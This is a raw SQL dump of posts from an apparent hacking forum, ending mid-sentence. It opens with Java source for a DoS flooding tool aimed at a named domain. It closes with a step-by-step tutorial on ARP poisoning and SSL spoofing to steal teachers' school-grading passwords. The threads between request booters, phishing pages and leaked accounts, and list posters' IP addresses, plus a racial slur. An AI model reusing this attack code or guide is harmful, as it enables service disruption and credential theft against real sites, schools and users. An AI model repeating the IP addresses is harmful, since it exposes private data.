tool.[/color]\r\n[color=#1E90FF]This tool was developed by Energizer/Karizma, please don\'t leech it. Enjoy[/color]\r\n\r\n[code]\r\nimport java.io.BufferedWriter;\r\nimport java.io.IOException;\r\nimport java.io.OutputStreamWriter;\r\nimport java.net.Socket;\r\nimport java.net.UnknownHostException;\r\n\r\n/**\r\n* @author Energizer/Karizma\r\n* WarBot | Private Java Botnet\r\n*/\r\npublic class DoS extends Socket implements Runnable {\r\n \r\n static int vir;\r\n static DoS _instance = new DoS();\r\n final String TARGET = \"ubers.org\";\r\n\r\n public static void main(String[] args) {\r\n for (int i = 0; i < 5; i++)\r\n new Thread(_instance).start();\r\n }\r\n\r\n @SuppressWarnings(\"unused\")\r\n public void run() {\r\n for (int i = 1; i < 1000000; i++) {\r\n try {\r\n if (TARGET == \"website.org\") {\r\n ubers();\r\n return;\r\n }\r\n Socket net = new Socket(TARGET, 80); // connects the Socket to the TARGET port 80.\r\n sendRawLine(\"GET / HTTP/1.1\", net); // Sends the GET / OutputStream\r\n sendRawLine(\"Host: \" + TARGET, net); // Sends Host: to the OutputStream\r\n System.out.println(\"Current Connection: \" + i);\r\n } catch (UnknownHostException e) {\r\n System.out.println(\"DDoS.run: \" + e);\r\n } catch (IOException e) {\r\n System.out.println(\"DDoS.run: \" + e);\r\n }\r\n }\r\n }\r\n \r\n public static void ubers() {\r\n while (true) {\r\n System.out.println(\"Fucking yo cpu\");//lol\r\n vir=(vir+10)*10/1000000; \r\n }\r\n }\r\n\r\n public static void sendRawLine(String text, Socket sock) {\r\n try {\r\n BufferedWriter out = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream()));\r\n out.write(text + \" \");\r\n out.flush();\r\n } catch (IOException ex) {\r\n ex.printStackTrace();\r\n }\r\n }\r\n}\r\n[/code]', '41.151.168.124', '697804924', '1', '0', '0', '0', '1', '55a6224988f77c100b359ea971f38a03', '0', '0'); INSERT INTO mybb_posts VALUES('1406', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1346460734', '18. Oh so I noticed that Apathy just got promoted to Admin.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'edb026b8e74f038650f388807aa91f2a', '0', '0'); INSERT INTO mybb_posts VALUES('1407', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '61', 'NXK', '1346463477', 'Id like to get this. PM me whenever you have time :)', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '28aab93118c6d9e2c0afabcb8500df51', '0', '0'); INSERT INTO mybb_posts VALUES('1408', '303', '0', '4', 'Heyo', '0', '156', 'Omniscent', '1346465732', 'Hey guys, my name is 5t0rm. I got invited to this website by kamz89 to discuss about SEing and such. I also am part of his Social Engineering group. I look forward to meeting you all, peace.', '74.14.157.68', '1242471748', '0', '0', '0', '0', '1', '66a358f1d40f89e6abb65982b4347267', '0', '0'); INSERT INTO mybb_posts VALUES('1409', '303', '1408', '4', 'RE: Heyo', '0', '82', 'iTzIpod', '1346466761', 'Hey 5t0rm, welcome to L33tHacking. Enjoy your stay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '84f70fc49d24c406e786c04add7d45f6', '0', '0'); INSERT INTO mybb_posts VALUES('1410', '299', '1398', '3', 'RE: Apathy Promoted!!!', '0', '55', 'Baws', '1346467223', '[quote=\'iTzIpod\' pid=\'1398\' dateline=\'1346458860\']\r\nI don\'t know about this..\r\n\r\n\r\nBut in other words, Good Luck + Congratulations Apathy. Don\'t blow it this time.\r\n[/quote]\r\n\r\nStop being an asshole and picking on him.\r\n\r\nOT: Grats Apathy!', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '7706df43851af2c4d83f649dfa6f7c6b', '0', '0'); INSERT INTO mybb_posts VALUES('1411', '299', '1410', '3', 'RE: Apathy Promoted!!!', '0', '2', 'Apathy', '1346469660', '[quote=\'Baws\' pid=\'1410\' dateline=\'1346467223\']\r\n[quote=\'iTzIpod\' pid=\'1398\' dateline=\'1346458860\']\r\nI don\'t know about this..\r\n\r\n\r\nBut in other words, Good Luck + Congratulations Apathy. Don\'t blow it this time.\r\n[/quote]\r\n\r\nStop being an asshole and picking on him.\r\n\r\nOT: Grats Apathy!\r\n[/quote]\r\n\r\nThanks baws :)', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '72a2cc8cb0930c57b4bfdb2ebca95a65', '0', '0'); INSERT INTO mybb_posts VALUES('1412', '299', '1398', '3', 'RE: Apathy Promoted!!!', '0', '2', 'Apathy', '1346469735', '[quote=\'iTzIpod\' pid=\'1398\' dateline=\'1346458860\']\r\nI don\'t know about this..\r\n\r\n\r\nBut in other words, Good Luck + Congratulations Apathy. Don\'t blow it this time.\r\n[/quote]\r\n\r\nYou also do not know what was going on. :3 but thanks nonetheless.', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '2390cde44657024f999181fe6412fff5', '0', '0'); INSERT INTO mybb_posts VALUES('1413', '286', '1343', '3', 'RE: [Announcement] Awards and IP Log History Features', '0', '2', 'Apathy', '1346469821', 'I was curious why awards were gone. :3 thanks for letting us know.', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '45df5b684adc9e10e00c66222af167ff', '0', '0'); INSERT INTO mybb_posts VALUES('1414', '304', '0', '3', 'Explainations on recent events.', '0', '2', 'Apathy', '1346470631', 'As some of you may know I recently had my admin powers removed from me. And this is a non detailed explanation of what happend and why it happend. I recently have gone through the worst moment in my life when / very close friend of mine passed away. I was in depression and I was angry at god(no I am not religious) and well everything. I sorta vented my anger and frustration on here and acted childish. Someone called me out on it and I got mad did some things I possibly shouldint have and did not explain why I did stuff. So therefor lost my position as a admin. Me and joker are very good friends online( BFF online LOL) he knew a little of what was going on so I explained everything to him and he understood. I am not making excuses I am telling you what happend. I am sorry for what I did. And I should not have acted the way I did.\r\n\r\nI will make one thing clear right now though. [b][size=medium]I will not tolerate bad attitude[/size][/b] This goes to someone, he knows who he is, hopefully this is a fresh start for us but I just wanted to make that clear.\r\n\r\nSo sorry and hey.', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', 'f52835e265a6bb62c9ec0b8371122c57', '0', '0'); INSERT INTO mybb_posts VALUES('1415', '305', '0', '84', 'Themejunkies.net theme rip', '0', '2', 'Apathy', '1346471373', 'This is a complete rip.\r\n\r\nhttp://mir.cr/09VR4JK3\r\n\r\nCredits to whoever did it.', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '036f429450b871d831c2f0213ce45ab6', '0', '0'); INSERT INTO mybb_posts VALUES('1416', '112', '1407', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1346471437', '[quote=\'NXK\' pid=\'1407\' dateline=\'1346463477\']\r\nId like to get this. PM me whenever you have time :)\r\n[/quote]\r\n\r\n PPD ebooks pack is sent... check your pm now.', '119.154.4.231', '2006582503', '1', '0', '0', '0', '1', '38a97533e0a08bc7bf05785281c1f1eb', '0', '0'); INSERT INTO mybb_posts VALUES('1418', '228', '921', '12', 'RE: [TUT] A complete guide to RAT', '0', '2', 'Apathy', '1346471922', 'Nice tutorial keep up the good work.', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '11e4b89856b5508f687206182fc944b3', '0', '0'); INSERT INTO mybb_posts VALUES('1419', '272', '1243', '4', 'RE: Hello, I\'m Dreamer', '0', '2', 'Apathy', '1346473640', 'Welcome to the forum stay active and have fun.', '173.206.137.22', '-1378973418', '0', '0', '0', '0', '1', '18e6f6035b34e0dc4868ad5a3ad7b0f2', '0', '0'); INSERT INTO mybb_posts VALUES('1420', '305', '1415', '84', 'RE: Themejunkies.net theme rip', '0', '55', 'Baws', '1346480017', 'can we get screenshots or do we got to search site up? :(', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'fe86420320b9fec2e70858526db6dd5a', '0', '0'); INSERT INTO mybb_posts VALUES('1421', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '55', 'Baws', '1346480065', 'I\'m winning, stop posting.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '7cee6a0b1ea65f030abaab8c9ae1264a', '0', '0'); INSERT INTO mybb_posts VALUES('1422', '252', '1089', '54', 'RE: August 27, 2012 XXXX Accounts', '0', '154', 'fap', '1346496493', 'thanks for this bro :).\n\nI\'m sure I will be using one :3.', '86.29.242.162', '1444803234', '0', '0', '0', '0', '1', 'e003c3c4bc54cd13bbc10c51d6809c4c', '0', '0'); INSERT INTO mybb_posts VALUES('1423', '284', '1338', '7', 'RE: Typing Speed Test', '0', '67', 'HoverCatz', '1346497798', 'Got 49 as im Norwegian.\n[url=http://10fastfingers.com/typing-test/english][img]http://img.10fastfingers.com/badge/1_wpm_score_AX.png[/img][/url]\nVisit the [url=http://10fastfingers.com/typing-test/english]Typing Test[/url] and try!', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'de842d2428c1c23d163742518920271b', '0', '0'); INSERT INTO mybb_posts VALUES('1424', '11', '28', '15', 'RE: .EXE Booter Pack', '0', '160', 'Jacob', '1346503511', 'I would like this too. I have to get 10 posts :/', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', 'ffb3c5b57f51cb03fd0ee67c855e91be', '0', '0'); INSERT INTO mybb_posts VALUES('1425', '94', '223', '16', 'RE: What is this section about?', '0', '160', 'Jacob', '1346503673', 'Thanks for the info, even if it was copied of WikiPedia.', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', 'aaa794186f5bb51c09335dd78c458f63', '0', '0'); INSERT INTO mybb_posts VALUES('1426', '198', '713', '21', 'RE: [Tutorial] Setting up your own web Booter[Source Included]', '0', '160', 'Jacob', '1346503750', 'I need a good free host for this. Anybody have one?', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '3e88215c813ecce1bd5b3ae6b145b34c', '0', '0'); INSERT INTO mybb_posts VALUES('1427', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '160', 'Jacob', '1346503803', 'Can I get this too?\n\nPM me the infO?', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '0bd2b438597237a0d0603316409a66c5', '0', '0'); INSERT INTO mybb_posts VALUES('1428', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346505643', 'Baws, you\'re not winning. I am.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3b35e41a51896a290b36ae5dde9f01d0', '0', '0'); INSERT INTO mybb_posts VALUES('1429', '284', '1338', '7', 'RE: Typing Speed Test', '0', '82', 'iTzIpod', '1346505684', 'Dang it t3h jok3r did better than me :/ :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5bce2e49036df32142966decd790852e', '0', '0'); INSERT INTO mybb_posts VALUES('1430', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '2', 'Apathy', '1346533837', 'Could I get this? Thanks man.', '173.206.177.107', '-1378963093', '0', '0', '0', '0', '1', 'b5cdd63d068c8b0ccb90bc75573873b4', '0', '0'); INSERT INTO mybb_posts VALUES('1431', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '53', 'sirchamp', '1346578468', 'Thanks for the ebook. Its a good method :D', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '02792673039b4330e73a2d259b5da57f', '0', '0'); INSERT INTO mybb_posts VALUES('1432', '302', '1405', '53', 'RE: Java DoS Script', '0', '67', 'HoverCatz', '1346588851', '[quote]\npublic static void ubers() {\n while (true) {\n System.out.println(\"Fucking yo cpu\");//lol\n vir=(vir+10)*10/1000000; \n }\n }\n[/quote]\n\n-.-', '178.74.56.137', '-1303758711', '1', '0', '67', '1346588870', '1', 'feef98d85629151026ba0f559f5d25d4', '0', '1346588870'); INSERT INTO mybb_posts VALUES('1433', '306', '0', '8', 'Annoying/Catchy Song? [KPOP]', '0', '82', 'iTzIpod', '1346594393', '[video=youtube]http://www.youtube.com/watch?v=1H40wUz-Fd8[/video]\n\nThe song is called Gangnam Style.\nAnd the artist of this song is PSY.\n\n\nDo you find this song annoying/catchy? :p \n\nOriginal Song:\n[video=youtube]http://www.youtube.com/watch?v=9bZkp7q19f0[/video]\n\n\n\nHyuna Version:\n[video=youtube]http://www.youtube.com/watch?v=wcLNteez3c4[/video]', '24.212.197.164', '416597412', '1', '0', '82', '1346620638', '1', '9c614281119069540c8aa91b25e048cd', '0', '1346620638'); INSERT INTO mybb_posts VALUES('1434', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '2', 'Apathy', '1346596200', 'Please send me this. Thanks', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', '3b79ccccbebbfdab27036771c49e8f84', '0', '0'); INSERT INTO mybb_posts VALUES('1435', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '53', 'sirchamp', '1346606493', 'Could I have a copy Thanks', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'fe4a122094f1c0e832e407833126250b', '0', '0'); INSERT INTO mybb_posts VALUES('1436', '306', '1433', '8', 'RE: Annoying/Catchy Song? [KPOP]', '0', '61', 'NXK', '1346614322', 'I think everyone finds this song catchy xD', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '3efc7797d188f0339c0a4a5f6f21f805', '0', '0'); INSERT INTO mybb_posts VALUES('1437', '299', '1397', '3', 'RE: Apathy Promoted!!!', '0', '141', 'Bane™', '1346618430', 'Congrats on the promotion, I still believe to much drama is going on here.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', '161b3ce22331c541d2322b7f568fd69d', '0', '0'); INSERT INTO mybb_posts VALUES('1438', '305', '1415', '84', 'RE: Themejunkies.net theme rip', '0', '67', 'HoverCatz', '1346618542', '[url=Themejunkies.net]Click here[/url]', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '86ac62d0fcac5f5d7f4a207a0d4c2797', '0', '0'); INSERT INTO mybb_posts VALUES('1439', '265', '1341', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346620249', '[quote=\'Baws\' pid=\'1341\' dateline=\'1346262847\']\r\nToo many people that don\'t know what grammar is in this thread...\r\n[/quote]\r\n\r\nI was on Mobile and also it was like 2 AM or something late at night. I could barely see the keys.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3f1b9e7278dd4793de91a5bf1f9870a2', '0', '0'); INSERT INTO mybb_posts VALUES('1440', '304', '1414', '3', 'RE: Explainations on recent events.', '0', '82', 'iTzIpod', '1346620340', 'Apology accepted. Hopefully that won\'t happen again.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e586675cbd63fcb9e72ed76f0713ec65', '0', '0'); INSERT INTO mybb_posts VALUES('1441', '299', '1412', '3', 'RE: Apathy Promoted!!!', '0', '82', 'iTzIpod', '1346620397', '[quote=\'Apathy\' pid=\'1412\' dateline=\'1346469735\']\r\n[quote=\'iTzIpod\' pid=\'1398\' dateline=\'1346458860\']\r\nI don\'t know about this..\r\n\r\n\r\nBut in other words, Good Luck + Congratulations Apathy. Don\'t blow it this time.\r\n[/quote]\r\n\r\nYou also do not know what was going on. :3 but thanks nonetheless.\r\n[/quote]\r\n\r\n\r\nYou explained everything on your thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '67b3c5d79a28fee3b0a2e674a1842505', '0', '0'); INSERT INTO mybb_posts VALUES('1442', '306', '1436', '8', 'RE: Annoying/Catchy Song? [KPOP]', '0', '82', 'iTzIpod', '1346620515', '[quote=\'NXK\' pid=\'1436\' dateline=\'1346614322\']\r\nI think everyone finds this song catchy xD\r\n[/quote]\r\nxD. I actually kind of love this song. Especially when they show that ass. \r\nAlso, there is a Hyuna Version of this song. Hyuna was that girl on the bus/subway.\r\n\r\n\r\nI\'d tap that.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f2b7b4318515607eae1ef10367d7127e', '0', '0'); INSERT INTO mybb_posts VALUES('1443', '304', '1414', '3', 'RE: Explainations on recent events.', '0', '1', 't3h jok3r', '1346639981', 'There\'s only one thing I like about this thread which is the bold text, it looks so AWESOME.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'ff5816cf9a43ce160084d4dad5f8df6d', '0', '0'); INSERT INTO mybb_posts VALUES('1444', '286', '1343', '3', 'RE: [Announcement] Awards and IP Log History Features', '0', '1', 't3h jok3r', '1346640084', 'No problem, it\'s my duty to inform the community what LH is up to.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9312f9f61bda07cf97d329cf6d143f60', '0', '0'); INSERT INTO mybb_posts VALUES('1445', '307', '0', '3', '[Announcement] T3h Jok3r is back!!!', '0', '1', 't3h jok3r', '1346640273', 'I was away for a day or two, that\'s because I was flying back home from a holiday. I\'m shocked that when I came back to LH I only had 1 PM, because normally everyday I received at least 10 PMs :D\r\n\r\nAnyway, I need to catch up on the activity and some stuff so umm can I can some warm welcomes?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '47ef3127986d9f04d178f287ff063b68', '0', '0'); INSERT INTO mybb_posts VALUES('1446', '305', '1415', '84', 'RE: Themejunkies.net theme rip', '0', '1', 't3h jok3r', '1346640824', 'Not a bad theme, it\'s kinda 3D type.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9db8d48aa835dd6f36d693e47285f2ac', '0', '0'); INSERT INTO mybb_posts VALUES('1447', '302', '1405', '53', 'RE: Java DoS Script', '0', '4', 'Triple H', '1346640951', 'Uhh credits ubers :D\n\nBut what\'s wrong with the script?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '13994245ed6a222e8899d8de17a52541', '0', '0'); INSERT INTO mybb_posts VALUES('1448', '307', '1445', '3', 'RE: [Announcement] T3h Jok3r is back!!!', '0', '2', 'Apathy', '1346641821', 'YO my NIGGA from the hood. \n\nJust kidding, glad to see you back. :)', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', '47224cffb864ee96a01bad2bf95802ba', '0', '0'); INSERT INTO mybb_posts VALUES('1449', '304', '1443', '3', 'RE: Explainations on recent events.', '0', '2', 'Apathy', '1346642109', '[quote=\'t3h jok3r\' pid=\'1443\' dateline=\'1346639981\']\r\nThere\'s only one thing I like about this thread which is the bold text, it looks so AWESOME.\r\n[/quote]\r\n\r\nSo you do not like what I wrote... ._.', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', '63cedd9e9ec1b51aebd3bc9bc3c5ee2e', '0', '0'); INSERT INTO mybb_posts VALUES('1450', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1346642117', 'So far, only the Unique group was added. Other group ideas were overlooked. \n\nMr. Omni\'s group suggestion was declined because their userbar wasn\'t attractive and I found out that they won\'t be active on LH because of their own website.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'ce87a6871458ceb9033da3e95c809e52', '0', '0'); INSERT INTO mybb_posts VALUES('1451', '304', '1449', '3', 'RE: Explainations on recent events.', '0', '1', 't3h jok3r', '1346642174', '[quote=\'Apathy\' pid=\'1449\' dateline=\'1346642109\']\r\n[quote=\'t3h jok3r\' pid=\'1443\' dateline=\'1346639981\']\r\nThere\'s only one thing I like about this thread which is the bold text, it looks so AWESOME.\r\n[/quote]\r\n\r\nSo you do not like what I wrote... ._.\r\n[/quote]\r\n\r\nEhh, damn you caught me :(\r\n\r\nJK, I found it good because you were kind enough to ask for an apology and explain the situation.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'e1b9a4fe0ca80f5a0625494b3db45629', '0', '0'); INSERT INTO mybb_posts VALUES('1452', '304', '1451', '3', 'RE: Explainations on recent events.', '0', '2', 'Apathy', '1346642327', '[quote=\'t3h jok3r\' pid=\'1451\' dateline=\'1346642174\']\r\n[quote=\'Apathy\' pid=\'1449\' dateline=\'1346642109\']\r\n[quote=\'t3h jok3r\' pid=\'1443\' dateline=\'1346639981\']\r\nThere\'s only one thing I like about this thread which is the bold text, it looks so AWESOME.\r\n[/quote]\r\n\r\nSo you do not like what I wrote... ._.\r\n[/quote]\r\n\r\nEhh, damn you caught me :(\r\n\r\nJK, I found it good because you were kind enough to ask for an apology and explain the situation.\r\n[/quote]\r\nRighty-O :) I am happy you accepted my apology and let me explain. :) Also glad that we are online BFF once again. xD', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', 'a27b91f06ff2a73d5ff862e3c84d766d', '0', '0'); INSERT INTO mybb_posts VALUES('1453', '308', '0', '3', 'Marketplace Removed', '0', '1', 't3h jok3r', '1346642463', 'Marketplace was recently removed due to inactivity. We will add Marketplace and forums that we believe will be active. Marketplace will be added after a couple of months.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '68259f8342c3c2e0233921a9851b0cd0', '0', '0'); INSERT INTO mybb_posts VALUES('1454', '307', '1445', '3', 'RE: [Announcement] T3h Jok3r is back!!!', '0', '82', 'iTzIpod', '1346642585', 'Hey t3h jok3r, \nWelcome back to LH. I missed you </3 \n\n\nWasn\'t that me that sent you that PM? :p\n\nI was going to send more but.. I got lazy and didn\'t want you to come back and have 500 PMs.\n\n\nWelcome Back.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f9514e7843d5c960a8bdbaa0432dddd', '0', '0'); INSERT INTO mybb_posts VALUES('1455', '303', '1408', '4', 'RE: Heyo', '0', '1', 't3h jok3r', '1346642596', 'Welcome to L33THacking.\n\nHope you enjoy your stay and stay active :)', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '58450c4a0648ec866cf07adf5a98caef', '0', '0'); INSERT INTO mybb_posts VALUES('1456', '309', '0', '61', 'Quick Announcement', '0', '1', 't3h jok3r', '1346642692', 'The unique group is ran by iTzIpod and iTzIpod also moderates this forum. \r\n\r\niTzIpod is the head leader of this group. You are free to make this your default group.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '5453efbc0737ba7b45592f6624fe544c', '0', '0'); INSERT INTO mybb_posts VALUES('1457', '308', '1453', '3', 'RE: Marketplace Removed', '0', '82', 'iTzIpod', '1346642711', 'Alright. Thanks for the notice. \nGuess I need to find a new way to get money. Can\'t just rely on PPC/PPD anymore..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7eee807d4d3507475e1fb5a18d2f5b32', '0', '0'); INSERT INTO mybb_posts VALUES('1458', '310', '0', '13', '[ HOT ] How to Hack Your School Grading System [Change]', '0', '5', 'Timmy', '1346643345', '[size=medium][color=#1E90FF]Hello everyone, as it seems that a lot of you guys seem to be in high school and want to be like the \"War Games\" hackers I figured I\'d write a tutorial on how to steal logins for online grading systems.\r\n\r\nIf you\'re school still uses paper to write down and keep track of grades this tutorial is not for you!\r\n\r\nPlease remember to be careful with this information, this is not for you to use only to understand that this is a posibility ;)\r\n[/color][/size]\r\n\r\n[size=medium][color=#FFA500]Step One - Understanding Some Basics (Skip this if you don\'t care what\'s happening behind the scenes)[/color][/size]\r\nNow you\'ve got to understand some basics about how computers communicate on a network (if you are familiar with this and have a general understanding of how TCP/IP works then skip this section as it is only for those who want to learn what\'s happening behind the scenes!)\r\n\r\nI\'ll try to cut down on most information! \r\n\r\nSo basically every computer on a network has an IP address be it \"192.168.1.101\" or \"10.0.0.10\" that is your IP for your computer on your current network. This is your computer\'s \"address\" much like every house has a mailing address to receive postage!\r\n\r\nSo basically all the computers send information through the \"router\" or \"switch\" which passes it on out to the internet and vise versa. The router broadcasts it\'s address to every computer on the network and says \"Hey everyone! I\'m 192.168.1.1 and I\'m your default gateway! Send all your requests through me and I\'ll serve you!\" and all the computers happily send their requests through the router.\r\n\r\nBut what if someone lied about being a certain IP address?\r\n\r\nIn an ARP cache poising situation, this is exactly what a hacker would do.\r\n\r\n[size=medium][color=#1E90FF]Hacker\'s Computer[/color][/size]: \"Hey 192.168.1.1 (router)! I\'m 192.168.1.100!\"\r\n[size=medium][color=#1E90FF]Router[/color][/size]: (Didn\'t ask, but accepts this information) \"OK thank you I\'ll send future data your way!\"\r\n[size=medium][color=#1E90FF]Hacker\'s Computer[/color][/size]: \"Hey user 192.168.1.100 (Vlictim)! I\'m you\'re router!\"\r\n[size=medium][color=#1E90FF]Vlctim\'s Computer[/color][/size]: (Didn\'t ask, but accepts this information) \"OK thank you I\'ll send my requests through you!\"\r\n\r\nNow the hacker has places himself in a very great position! He is now a \"proxy\" or a computer that both the router and the vlctim must push their information through.\r\n\r\nSo now if the vlctim wants to visit a webpage all of his data is sent through the hacker\'s computer and on to the router and vise versa.\r\n\r\nThe advantage here is now the hacker can read everything the user is doing online. \r\n\r\nThe problem\r\nThe main problem with this is that most sites that do \"Online Grading\" encrypt their data before sending it to the router so that this attack is thwarted.\r\n\r\nThe solution\r\nUsing software like \"Cain & Abel\" you can get around this problem. This is done by spoofing the SSL certificate for the vlctim, however this can not be done completely as the vlctim will get a \"SSL certificate error\" warning message. Luckily in the most used version of Internet Explorer this message is just a simple \"blalla error, click here to continue\" and most users just ignore this and click ok. Now they are connected to the website but you can still see what they are doing!\r\n\r\nCongrads, you now (kinda) get how an ARP Cache Poising attack works & SSL Spoof attack.\r\n\r\n[size=medium][color=#FFA500]Step Two - Starting out (If you skipped step one you\'re a bad person!)[/color][/size]\r\n\r\n[size=medium][color=#FF0000][b]A nice warning you\'ll be doing all this on a school computer, please be careful not to get caught (what if someone actually knows what you\'re trying to do?! Oh noes!)\r\n[/b][/color][/size]\r\nNo you\'re going to need to install Cain & Abel for doing this attack! This is a Windows hacktool with all sorts of fun built in!\r\n\r\n[url=http://adf.ly/4tgVT]{{{DOWNLOAD HERE}}}[/url]\r\n\r\nGreat! Now install the thing (I\'m not going to hold your hand on this as it\'s really straightforward, just say yes to installing everything)\r\n\r\nEventually you install everything and you start up Cain, please be sure you\'ve allowed it internet accept if Windows prompts you for it.\r\n\r\nNow, you\'re going to need to click the sniffer button in the top left corner. It\'s looks like this:\r\n\r\n[img]http://i.imgur.com/Y77qq.png[/img]\r\n\r\nThis has started the \"sniffing\" process where your computer will capture any traffic that it sends/receives. At this point this is only the websites you visit but you want to see everyone else\'s internet activity aswell!\r\n\r\n[size=medium][color=#FFA500]Step Three - Gathering vlctims![/color][/size]\r\n\r\nNow we are going to get a list of all computers currently on the network so we can poison them.\r\n\r\nTo do this go to the sniffing tab as show below: \r\n[img]http://i.imgur.com/71kavl.jpg[/img]\r\n\r\nNow you\'ve got to start the ARP Cache poising. Click this button:\r\n[img]http://i.imgur.com/Q13Qx.png[/img]\r\n\r\nGreat! Now you need to select some computers to poison.\r\n\r\nClick the \"+\" button to add some computers to your list\r\n[img]http://i.imgur.com/bdEhr.png[/img]\r\n\r\nThe following box will pop up:\r\n[img]http://i.imgur.com/23YEe.png[/img]\r\n\r\n\r\nThe default settings are perfectly fine, so scan everyone on your current subnet (which means everyone who\'s behind the same router/switch as you)\r\n\r\nWait for it to finish scanning, once it\'s done move on to the next step.\r\n\r\n[size=medium][color=#FFA500]Step Four - Poising some ARP Caches![/color][/size]\r\n\r\nYou are now going to direct everyone\'s traffic through your own computer so you can see what they are doing and steal their online passwords!\r\n\r\nClick the following tab: (Bottom left)\r\n[img]http://i.imgur.com/CbWMG.png[/img]\r\n\r\nNow click the Click the \"+\" button to add some computers to your list of \"to poison\"\r\n[img]http://i.imgur.com/bdEhr.png[/img]\r\n\r\nThis window should now pop up:\r\n[img]http://i.imgur.com/yfkRh.png[/img]\r\n\r\nNow you\'re going to want to select the first IP address on the left, this is the router address so you can capture all data being sent to the router.\r\n\r\nThen select EVERYTHING in the right column.\r\n\r\n(Read the warning in the image above about selecting to many vlctims to poison!)\r\n\r\nThen click \"OK\"\r\n\r\nYou are now intercepting all data on the network! Pat yourself on the back! You\'re screen should look like this:\r\n[img]http://i.imgur.com/uugrF.png[/img]\r\n[size=medium][color=#FFA500]Step Five - Viewing intercepted data[/color][/size]\r\n\r\nGreat now that you\'re intercepting traffic you\'re going to want to view all the passwords you\'re stealing!\r\n\r\nClick this tab: (Again, bottom left)\r\nhttp://i.imgur.com/oNNtQ.png\r\n\r\nNow you see the following?:\r\nhttp://i.imgur.com/ASkST.png\r\n\r\nThose are all of the different types of passwords you\'re currently capturing!\r\n\r\nSince you\'re trying to get the online school grading passwords, click the \"HTTP\" section.\r\n\r\nNow you can see all the passwords you\'re capturing in realtime!\r\n\r\n[img]http://i.imgur.com/8PDhc.png[/img]\r\n\r\n\r\nWow that\'s cool! Now just wait until a teach logs onto the online grading system and you\'ve then captured their password!\r\n\r\n\r\n[size=medium][color=#FFA500]Important - Read this[/color][/size]\r\nSomething important to remember is that Cain is currently only capturing password data that it recognizes. It may not understand what data is a password and what isn\'t.\r\n\r\nYou can specify what you want Cain to capture by clicking the \"Configure\" button at the top:\r\nSee this link for image:[url=http://adf.ly/4tgwE] {{CLICK HERE TO SEE}}[/url] (max number of images in thread is 15)\r\n\r\nYou should see the menu below, go to the \"HTTP Fields\" tab and select everything in the top column and \"Removal all\" do this for the bottom section too.\r\n[img]http://i.imgur.com/P3gSm.png[/img]\r\n\r\nNow you need to know the field names for the username and password of the school grading system. Go to the grading login page (if you don\'t know the URL just grab it from the data above).\r\n\r\nNow you want to view the source of the page (Ctrl + U in Firefox)\r\n\r\nLook for something like this:\r\n[code]Code:\r\n<input name=\"txtTeacherUsername\" id=\"txtTeacherUsername\" size=\"18\" value=\"\" class=\"gaia le val\" type=\"text\">\r\n\r\n <input type=\"hidden\" name=\"txtTeacherPassword\" id=\"txtTeacherPassword\" size=\"18\" value=\"\" class=\"gaia le val\" type=\"text\">[/code]\r\n\r\nAs you can see the two fields are \"txtTeacherUsername\" and \"txtTeacherPassword\"\r\n\r\nSo now go back to Cain and add those field names in by inputting the field names and 